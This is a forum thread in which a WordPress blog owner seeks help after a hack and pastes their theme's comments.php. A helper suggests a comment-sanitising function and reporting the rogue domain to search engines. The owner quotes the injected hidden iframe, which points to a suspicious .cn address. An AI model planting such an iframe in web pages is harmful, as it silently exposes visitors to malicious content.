PHP Parse Error

Lol I don't really understand that. Sorry for being a dumbass.

Where do I put this:

function cleanText($text)
{
$text1=preg_replace('#[^A-Za-z0-9.!, -]#', '', $text);
return $text1;
}

I've got a backup of my database but that was taken before I updated to the newest version of WP when the hack was there so would the hack be contained in the DB?

No worries it's alright.
Place that above the insert query for the comment script.
It depends on how they are getting in TBH, it may not be the comment script, if they are on the same server then TBH they wouldn't need to manually hack.

Did you keep the address the iframe pointed to?
Submit it to Window Live search, Yahoo! and Google as a spam report and the site may then get a nice red this will hurt your rankings sign off all 3.

Have you got a url for me to have a look at?

Yeah this is the Iframe code

Code:
<iframe src="http://betstarwager.cn/in.cgi?cocacola75" width=1 height=1 style="visibility: hidden"></iframe>

This is my comments.php do I insert your code just after the top comments or?

Code:
<?php/** * @package WordPress * @subpackage Classic_Theme */if ( post_password_required() ) : ?><p><?php _e('Enter your password to view comments.'); ?></p><?php return; endif; ?><h2 id="comments"><?php comments_number(__('No Comments'), __('1 Comment'), __('% Comments')); ?><?php if ( comments_open() ) : ?>    <a href="#postcomment" title="<?php _e("Leave a comment"); ?>">&raquo;</a><?php endif; ?></h2><?php if ( $comments ) : ?><ol class="commentlist"><?php foreach ($comments as $comment) : ?><li <?php echo $oddcomment; ?>id="comment-<?php comment_ID() ?>"><cite><span class="author"><?php comment_author_link() ?></span><br /><span class="time"><?php comment_time() ?></span> on <a href="#comment-<?php comment_ID() ?>" title=""><?php comment_date('F jS, Y') ?></a> <?php edit_comment_link('edit','  ',''); ?></cite><div class="commenttext"><?php comment_text() ?></div><?php if ($comment->comment_approved == '0') : ?><em>Your comment is awaiting moderation.</em><?php endif; ?></li><?php/* Changes every other comment to a different class */$oddcomment = ( empty( $oddcomment ) ) ? 'class="alt" ' : '';?><?php endforeach; /* end for each comment */ ?></ol><?php else : // If there are no comments yet ?>    <p class="no-comments"><?php _e('No comments yet.'); ?></p><?php endif; ?><?php if ( comments_open() ) : ?><h2 id="postcomment"><?php _e('Leave a comment'); ?></h2><?php if ( get_option('comment_registration') && !$user_ID ) : ?><p><?php printf(__('You must be <a href="%s">logged in</a> to post a comment.'), get_option('siteurl')."/wp-login.php?redirect_to=".urlencode(get_permalink()));?></p><?php else : ?><form action="<?php echo get_option('siteurl'); ?>/wp-comments-post.php" method="post" id="commentform"><?php if ( $user_ID ) : ?><p><?php printf(__('Logged in as %s.'), '<a href="'.get_option('siteurl').'/wp-admin/profile.php">'.$user_identity.'</a>'); ?> <a href="<?php echo wp_logout_url(get_permalink()); ?>" title="<?php _e('Log out of this account') ?>"><?php _e('Log out &raquo;'); ?></a></p><?php else : ?><p class="input"><input type="text" name="author" id="author" value="<?php echo $comment_author; ?>" size="22" tabindex="1" /><label for="author"><small><?php _e('Name'); ?> <?php if ($req) _e('(required)'); ?></small></label></p><p class="input"><input type="text" name="email" id="email" value="<?php echo $comment_author_email; ?>" size="22" tabindex="2" /><label for="email"><small><?php _e('Mail (will not be published)');?> <?php if ($req) _e('(required)'); ?></small></label></p><p class="input"><input type="text" name="url" id="url" value="<?php echo $comment_author_url; ?>" size="22" tabindex="3" /><label for="url"><small><?php _e('Website'); ?></small></label></p><?php endif; ?><!--<p><small><strong>XHTML:</strong> <?php printf(__('You can use these tags: %s'), allowed_tags()); ?></small></p>--><p><textarea name="comment" id="comment" cols="100%" rows="10" tabindex="4"></textarea></p><p><input name="submit" type="submit" id="submit" tabindex="5" value="<?php echo attribute_escape(__('Submit Comment')); ?>" /><input type="hidden" name="comment_post_ID" value="<?php echo $id; ?>" /></p><?php do_action('comment_form', $post->ID); ?></form><?php endif; // If registration required and not logged in ?><?php else : // Comments are closed ?><p><?php _e('Sorry, the comment form is closed at this time.'); ?></p><?php endif; ?>

I suddenly started getting loads of spam comments on my blog a few days before this happened so maybe it is related to the comment script?

What URL do you want? The URL for my site is in my signature. Or do you mean the URL the Iframe thing is pointing at?

I emailed my host about it and he said he corrected some code in the index.php file but I don't know what he did and I haven't done anything to my index.php so I don't know what could have been wrong with it. However, the site loads now but the iframe code is still there when viewing the source and it's causing the footer to jump up because of an extra ">" in the code. Weird... :confused:

EDIT: Emailed them back again and they've now fixed it for me! And it seems to be working, Hooray! Thanks for your help anyways Jaz!

Back